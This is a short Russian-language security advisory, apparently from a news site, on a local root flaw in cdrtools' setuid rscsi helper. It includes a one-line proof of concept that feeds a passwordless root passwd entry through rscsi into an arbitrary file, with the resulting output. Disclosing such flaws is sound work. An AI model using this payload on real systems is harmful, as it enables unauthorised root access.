Уязвимость обнаружена в cdrtools в программе
rscsi. Локальный пользователь может получить
root привилегии.

Обнаруженная уязвимость в set user id (setuid) root
user вспомогательном приложении rscsi
позволяет локальному пользователю
перезаписывать произвольные файлы на
системе. Дополнительные подробности не
раскрываются.

Уязвимость обнаружена в Cdrtools 2.01a18.

Пример:

elguapo@gentoo elguapo $ echo C`echo -e "\x08\x08\x08\x08\x08\x08\x08\x08\x08\
x08r00t::0:0:root:/:/bin/bash\x0a"` | /opt/schily/sbin/rscsi /tmp/lala
Segmentation fault (this segfault is not related to the security issue)

elguapo@gentoo elguapo $ cat /tmp/lala
rscsid: user id 1000, name elguapo
rmt: stdin is a PIPE
r00t::0:0:root:/root:/bin/bash

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии